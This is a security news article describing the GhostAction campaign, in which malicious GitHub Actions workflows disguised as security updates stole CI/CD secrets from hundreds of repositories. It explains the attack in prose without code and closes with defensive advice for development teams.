The GhostAction Attack: How 3,300+ Secrets Were Stolen from GitHub Repositories

The GitHub ecosystem was recently hit by one of its largest compromises in years: the GhostAction attack. This sophisticated campaign, uncovered by researchers at GitGuardian, highlights a critical vulnerability that many development teams overlook—the security of their CI/CD pipelines.

Here’s a breakdown of what happened and what your team needs to know.

What Was the GhostAction Attack?

Attackers launched a large-scale campaign to inject malicious GitHub Actions workflows into hundreds of repositories. By disguising their code as routine security updates, they tricked users into running scripts that exfiltrated sensitive secrets from their development environments.

The scale of the breach is staggering:

• 3,325 secrets were compromised.
• 817 repositories were affected.
• 327 users had their credentials stolen.

The stolen secrets included high-value tokens for PyPI, npm, and Docker Hub, as well as keys for cloud services like AWS and Cloudflare.

How Did the Attack Work?

The investigation began with an incident in the FastUUID project. An attacker, using the alias "Grommash9," submitted a pull request with the description “Add Github Actions Security workflow.”

Instead of improving security, the workflow contained a malicious script. When triggered by a push or manual run, it extracted secrets from the CI/CD environment and sent them via an HTTP request to a remote server controlled by the attacker. To avoid suspicion, the script included harmless-sounding commands like “Prepare Cache Busting,” but its true purpose was data theft.

Although the project maintainers and PyPI responded quickly—revoking the commit and placing the project in read-only mode—the investigation revealed this was just one piece of a much larger puzzle. The same attacker had injected identical workflows into hundreds of other public and private repositories.

The Real Danger: A Supply-Chain Nightmare Averted

The most significant threat was the potential for a massive supply-chain attack. With stolen tokens for npm, PyPI, and Docker Hub, attackers could have published malicious versions of popular packages and container images. Anyone who downloaded these compromised dependencies would have been infected.

While a large-scale malicious release was prevented this time, the active use of some stolen credentials has already been confirmed, including AWS keys and database passwords.

The Key Takeaway for Developers and Security Teams

The GhostAction attack proves that CI/CD pipelines are a primary target for attackers. They are no longer just build tools; they are powerful environments with access to your most valuable secrets.

This incident shows that attackers are becoming more sophisticated. They analyze legitimate workflows to identify the names of secrets used, then create fake scripts to steal those exact credentials.

How to Protect Your Organization

• Audit Your Workflows: Treat your .github/workflows files with the same scrutiny as your application source code.
• Scrutinize Pull Requests: Be wary of pull requests from unknown contributors, especially those modifying CI/CD configurations.
• Implement Secret Scanning: Proactively scan your repositories and CI/CD logs for exposed credentials. Don’t wait for a breach to find out you’ve been compromised.

The GhostAction attack is a wake-up call. Securing your CI/CD pipeline isn’t just a best practice—it’s essential for protecting your code, your customers, and your company.